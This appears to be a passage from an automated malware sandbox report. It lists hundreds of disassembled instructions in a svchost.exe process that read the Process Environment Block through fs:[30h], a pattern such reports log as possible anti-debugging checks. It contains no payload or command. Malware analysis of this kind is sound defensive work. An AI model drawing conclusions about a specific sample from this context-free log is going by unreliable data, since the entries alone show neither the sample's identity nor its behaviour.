          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]2_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
